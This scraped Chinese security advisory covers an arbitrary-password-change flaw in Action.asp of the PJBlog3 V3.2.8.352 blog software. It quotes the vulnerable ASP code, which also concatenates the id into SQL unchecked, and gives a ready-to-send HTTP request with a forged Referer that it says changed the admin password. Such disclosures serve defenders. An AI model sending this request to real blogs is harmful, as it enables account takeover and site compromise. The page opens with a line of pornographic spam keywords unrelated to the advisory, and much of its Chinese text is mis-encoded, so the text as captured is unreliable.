亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

PJBlog3 V3.2.8.352文件Action.asp修改任意用戶密碼

  發(fā)布時(shí)間:2011-12-13 15:23:31   作者:佚名   我要評(píng)論
PJBlog一套開源免費(fèi)的中文個(gè)人博客系統(tǒng)程序,采用asp+Access的技術(shù),具有相當(dāng)高的運(yùn)作效能以及更新率,也支持目前Blog所使用的新技術(shù)
發(fā)布日期:2011-06.19
發(fā)布作者:佚名

影響版本:PJBlog3 V3.2.8.352

漏洞類型:設(shè)計(jì)錯(cuò)誤
漏洞描述:PJBlog一套開源免費(fèi)的中文個(gè)人博客系統(tǒng)程序,采用asp+Access的技術(shù),具有相當(dāng)高的運(yùn)作效能以及更新率,也支持目前Blog所使用的新技術(shù)

在文件Action.asp中:

復(fù)制代碼
代碼如下:

ElseIf Request.QueryString("action") = "updatepassto" Then //第307行
If ChkPost() Then
Dim e_Pass, e_RePass, e_ID, e_Rs, e_hash, d_pass
e_ID = CheckStr(UnEscape(Request.QueryString("id")))
e_Pass = CheckStr(UnEscape(Request.QueryString("pass")))
e_RePass = CheckStr(UnEscape(Request.QueryString("repass")))
Set e_Rs = Server.CreateObject("Adodb.Recordset")
e_Rs.open "Select * From [blog_Member] Where [mem_ID]="&e_ID, Conn, 1, 3
e_hash = e_Rs("mem_salt")
d_pass = SHA1(e_Pass&e_hash)
e_Rs("mem_Password") = d_pass
e_Rs.update
e_Rs.Close
Set e_Rs = nothing
response.Write("1")
Else
response.write lang.Err.info(999)
End If

程序在修改用戶的密碼時(shí),沒(méi)有對(duì)用戶的合法權(quán)限做驗(yàn)證,導(dǎo)致攻擊者可以修改任意用戶的密碼。 應(yīng)該先判斷用戶權(quán)限

測(cè)試方法:

復(fù)制代碼
代碼如下:

//需修改Referer值通過(guò)程序檢測(cè)
GET /action.asp?action=updatepassto&id=1&pass=123456&repass=test HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://127.0.0.1/test.htm
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler 4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 127.0.0.1
Connection: Keep-Alive
Cookie: PJBlog3Setting=ViewType=normal; PJBlog3=memRight=000000110000&memHashKey=&memName=&DisValidate=False&memLastpost=2009%2D11%2D08+11%3A18%3A27&exp=2010%2D11%2D8&Guest=%7Brecord%3Atrue%2Cusername%3A%27test%27%2Cuseremail%3A%27ww%40126%2Ecom%27%2Cuserwebsite%3A%27http%3A%2F%2Fwww%2Ebaidu%2Ecom%2Findex%3F%26lt%3Bfff%26gt%3B%27%7D; ASPSESSIONIDASDSSADD=DAMNKLBDKADFCKOGKEJOKJPP; ASPSESSIONIDCQCQTBCD=MOJFLCCDBICHALBBGGMMENML

(測(cè)試結(jié)果:成功修改管理密碼)

相關(guān)文章

最新評(píng)論